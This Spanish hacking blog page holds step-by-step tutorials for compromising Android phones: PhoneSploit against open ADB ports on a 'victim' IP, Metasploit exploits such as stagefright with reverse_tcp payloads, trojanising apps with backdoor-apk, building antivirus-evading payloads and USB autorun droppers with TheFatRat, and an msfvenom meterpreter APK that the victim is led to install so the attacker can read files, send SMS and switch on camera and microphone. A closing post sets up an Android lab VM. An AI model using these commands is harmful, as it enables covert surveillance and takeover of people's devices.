Mostrando entradas con la etiqueta Android. Mostrar todas las entradas
Mostrando entradas con la etiqueta Android. Mostrar todas las entradas

viernes, 31 de mayo de 2019

Tutorial PhoneSploit


Hola amigos.

Hoy, os presento PhoneSploit, herramienta con la que explotaremos ADB.

¿Qué es ADB?, ADB (Android Debug Bridge) es una herramienta de tipo cliente servidor, que permite abrir una ventana de comandos (o una interfaz gráfica) de un dispositivo Android, para poder administrarlo.

Con ADB podemos actualizar Android desde un archivo OTA (Archivos de actualización Over The Air, la forma más sencilla de actualizar el sistema, las que te llegan a las notificaciones de tu Android), instalar APKs, etc.

En primer lugar os recomiendo tener instalados rar, android-sdk y adb

apt-get install rar

apt-get install android-sdk

apt-get install adb

Posteriormente clonamos PhoneSploit


Nos metemos en el directorio de PhoneSploit

cd PhoneSploit

Descomprimimos adb.rar

rar x adb.rar

Ahora, hacermos una copia de seguridad main.py

cp main.py main2.py

editamos main.py

leafpad main.py

Cambiamos las líneas (Si vas a usar el script en Windows, no hace falta)

coloring_file = open(CurrentDir+"\\install\\coloring.txt", "a+")
line = open(CurrentDir+"\\install\\coloring.txt", "a+").readline()

open(CurrentDir+"\\install\\coloring.txt", "w").close()

os.chdir(CurrentDir+"//adb")

Por

coloring_file = open(CurrentDir+"/install/coloring.txt", "a+")
line = open(CurrentDir+"/install/coloring.txt", "a+").readline()
open(CurrentDir+"/install/coloring.txt", "w").close()

os.chdir(CurrentDir+"/adb")

Guardamos y cerramos.

python2 main.py



Selecciono, en mi caso, L.



Le digo que Y, porque lo instalé con apt-get install adb



Si ves un mensaje previo a esta imagen:

error: no devices/emulators found
sh: 1: cls: not found

No te alarmes. Todo va correctamente.

De acuerdo, vamos ahora a buscar dispositivos con el puerto ADB abierto


<imagen 4>

Ahora, en nuestra terminal, seleccionamos

phonesploit(main_menu) > 3

Enter a phones ip address.
phonesploit(connect_phone) > ip_VICTIMA
connected to ip_VICTIMA

Y ya podemos jugar.

Cuando nos pida “device name”, deberemos introducir ip_VICTIMA:5555

Ya que 5555 es el puerto en el que corre 5555.

viernes, 15 de septiembre de 2017

Exploits de metasploit para android

Hola amigos:

Hoy vamos a conocer los exploits que trae metasploit (en el momento de escribir estas líneas) para explotar android.

Uno de ellos es stagefright_mp4_tx3g_64_bit:

use exploit/android/browser/stagefright_mp4_tx3g_64_bit

set SRVHOST 192.168.1.131

set URIPATH /

set PAYLOAD linux/armle/mettle/reverse_tcp

set LHOST 192.168.1.131

exploit

Montará un servidor en el puerto indicado (como no lo hemos cambiado, el puerto 8080). Aunque sí es para varios móviles, no es para todos. Cuando la víctima ingresa a esa url maliciosa, explota una vulnerabilidad en la librería stagefright, mediante un archivo mp4.

Otros exploit son:

  • exploit/android/adb_server_exec: Explota un dispositivo android que está escuchando mensajes de depuración adb (adb nos permite interactuar entre un android y un pc).


  • webview_addjavascriptinterface: Para la versión 4.1.2. Un código javascript no confiable puede ejecutar comandos arbitrarios.


  • adobe_reader_pdf_js_interface: Explota una vulnerabilidad de Acrobat Reader en versiones menores a 11.2.0 que crea un pdf infectado.

  • frutex_requeue: Explota una vulnerabilidad en frutex_requeue en el kernel de linux. Todos los núcleos anteriores a Junio del 2014 están expuestos. Es necesaria una sesión previa de meterpreter.

  • put_user_vroot: Permite a un usuarios sin privilegios leer y escribir en la memoria del kernel.




viernes, 23 de diciembre de 2016

Infectar una app fácil

Hola amigos:

Hace unos posts, hablábamos de cómo inyectar un payload de android en una app, y lo hacíamos a mano.

En esta ocasión, vamos a presentar un script que nos lo automatizará. Este script se llama backdoor-apk y lo descargamos de https://github.com/dana-at-cp/backdoor-apk

Lo descomprimimos

unzip backdoor-apk-master.zip

Nos vamos al directorio /backdoor-apk-master/backdoor-apk

Copiamos la app víctima dentro de este mismo directorio.

Y Ejecutamos:

./backdoor-apk.sh <app_victima>

Ojo, es importante poner en el mismo directorio de backdoor-apk.sh la app objetivo, pues si no, nos dará un error.

Y completamos lo que nos piden (tipo de payload, IP local y puerto de destino).





La app infectada la podremos encontrar en el subdirectorio /original/dist/

Podemos iniciar metasploit preparadito para escuchar el payload con

msfconsole -r backdoor-apk.rc






Para borrar los archivos generados y poder volver a usar el script:

./cleanup.sh.

Y ahora toca disfrutar las vacaciones de Navidad. El próximo post será el 13 de Enero del 2017 (al menos, lo intentaré). Sin embargo, estamos en contacto en las redes sociales:
  • Facebook: facebook.com/Manugomez1977
  • Twitter: @manugomez1977
  • Instagram: @MANUGOMEZ1977
Me gustaría agradeceros vuestras visitas, vuestras dudas y vuestro apoyo que he tenido en estos 12 meses de vida del blog. Intentaré seguir posteando y, por supuesto, seguir aprendiendo (que me queda mucho todavía).

Que paséis una Feliz Navidad, un feliz 2017 y un expléndido Día de Reyes.

Felices fiestas y ¡¡¡ Happy Hacking !!!


viernes, 14 de octubre de 2016

Tutorial TheFatRat

Hola a todos.

Hoy vamos a presentar un script que va a ayudar a crearnos payloads con msvenom pero, que va a ser indetectable por muchos de los antivirus. Este script recibe el nombre de TheFatRat.

TheFatRat nos permitirá crear payloads tanto para windows como para android, además, lo podemos inyectar a un ejecutable.

En primer lugar, debemos instalar backdoor-factory (si no los tenemos ya instalados).

Apt-get install backdoor-factory

También deberemos instalar mingw32, para ello, si tenemos kali 2016, abrimos /etc/apt/sources.lists y añadimos

deb http://old.kali.org/kali sana main non-free contrib

Guardamos.

Escribimos en la terminal.

apt-get update

y ahora ponemos

apt-get install mingw32

Para los que tengan kali sana, basta con el apt-get install mingw32

El siguiente paso es descargarnos el script desde https://github.com/Screetsec/TheFatRat



descomprimimos donde queramos

unzip TheFatRat-master.zip

Damos permisos de ejecución

chmod +x fatrat

chmod +x powerfull.sh

Ejecutamos

./fatrat



Enter



Las salidas nos las guarda en el directorio output


Además, te crea los archivos para un autorun para usb/dvd, que sólo los tendrías que copiar en el usb/dvd víctima. Estos archivos se crearán en el directorio /autorun

Para cambiar los iconos para el autorun, los deberás copiar en el directorio /icons.

En la opción 1 crearemos un payload encriptado con msfvenom, y en ella tendremos para elegir.



En la opción 2 crearemos un backdoor para la arquitectura x86 de 32 bits para Windows, casi 100% indetectable. Eso sí, tarda mucho en generar el payload. Crea un programa en C con un payload (encriptado shikata ga nai) meterpreter reverse tcp. La salida constará de dos programas, Powerfull.exe y Powerfull-fud.exe.

La opción 3 crea un backdoor indetectable con AVOID v 1.2. Genera un payload con metasploit y nos da a elegir el tipo de binario.



El payload generado se guarda en una carpeta cuyo nombre coincidirá con el nombre que le hayamos puesto al payload. Los ficheros para el autorun estarán guardados en la carpeta autorun.

La opción 4 genera un payload y lo inyecta en otro archivo ejecutable, infectándolo, utilizando para ello backdoor factory. Nos ofrece unos cuantos payloads para inyectar.



Tras buscar los caves disponibles, nos pregunta cuál queremos usar para inyectar.



Los caves son huecos en el programa original en el cual se copiará el payload.

El ejecutable infectado se guardará en la carpeta /backdoored/output.

La opción 5 nos crea distintos listeners




Cada uno de los cuales nos da para elegir el payload que tendríamos que cargar.



Nos abrirá una terminal con el exploit multi handler de metasploit con la configuración con la que hemos configurado el listener.

La opción 6 nos abre metasploit.



La opción 7 usa searchsploit para buscar un exploit cualquiera dentro de nuestro equipo.



La opción 8 nos hace una limpieza de lo que hemos creado, borrando así los payloads.



La opción 9 nos abre la ayuda.



La opción 10 nos pone los créditos.



Happy Hacking.

Recordad que la idea de este blog es aprender, no enseñar a cometer ilegalidades.

Por favor, sígueme, además en las redes sociales:
  • Página de Facebook: Manugomez1977
  • twitter: @manugomez1977
  • instagram: @manugomez1977

Para poder seguir escribiendo posts, por favor, haz click en los anuncios.



viernes, 19 de febrero de 2016

Intrusión a Android

En esta ocasión, vamos a hacer un PAYLOAD para Android.

Miramos a ver qué IP tenemos:

ifconfig



generamos el payload:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R > payload.apk




Para pasarlo a Android, voy a utilizar el servidor apache de Kali:

cp payload.apk /var/www/

service apache2 start

Iniciamos Metasploit:

msfconsole





use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST 192.168.1.134

set LPORT 4444

exploit



Descargamos el archivo en nuestro dispositivo Android:



Pinchamos para instalar



Si nos sale:



Pinchamos a Configuración



Marcamos “Orígenes Desconocidos”


Vamos a la parte de descargas:




Pulsamos Siguiente e Instalar.




La víctima lo ejecuta

Y ya tenemos la sesión de meterpreter:


Y ya podemos navegar por los archivos, mandar SMS, activar la cámara, activar el micrófono, etc.



viernes, 12 de febrero de 2016

Instalación de Android en laboratorio Pentesting



En este nuevo post vamos a explicar como instalar Android en nuestro laboratorio de Pentesting.

En primer lugar, descargamos el sistema operativo Android de:


Descargaremos android-x86-4.3-20130725.iso , o si hay alguna versión más reciente, pues esa.


Nueva Máquina Virtual:



Con 300 Mb de memoria tenemos suficientes:








Finalizamos, seleccionamos nuestro sistema virtual Android y damos al botón Configuración y seleccionamos red



Habilitamos el adaptador puente y lo asignamos a nuestra tarjeta de red:



Aceptamos.

Vamos a Almacenamiento:




En la sección atributos, pinchamos el logotipo del CD y seleccionamos nuestra imagen iso. Si es necesario, buscarla en “Seleccione archivo de unidad óptica”.



Aceptamos




Le damos al botón Iniciar.



Instalamos en disco duro



New




Primary




O bien le damos a intro, o bien modificamos el valor. Yo lo he dado a intro directamente.




Bootable




Dejamos el Tipo Linux.

Le damos a Write







Le damos a yes y seleccionamos Quit para salir




Ext3




Le damos a yes




En la siguiente pantalla le decimos que sí, que instale GRUB.




Le decimos que sí







Reboot, pero no dejo que se reinicie, apago la máquina, cerrando la ventana.

En la configuración de la máquina virtual, quito el cd, para ello, le doy al botón derecho a la imagen iso y cerramos conexión




Le decimos que la elimine.




Aceptamos e iniciamos la máquina Android de nuevo.







Le damos a Español

Con el tabulador, vamos a iniciar y damos intro.




pinchamos con el botón derecho al logotipo


y pinchamos en la ventanita que nos sale: integración del ratón. El logotipo habrá cambiado a:

 





Saltamos la conexión wifi

Y configuramos











Le damos a finalizar.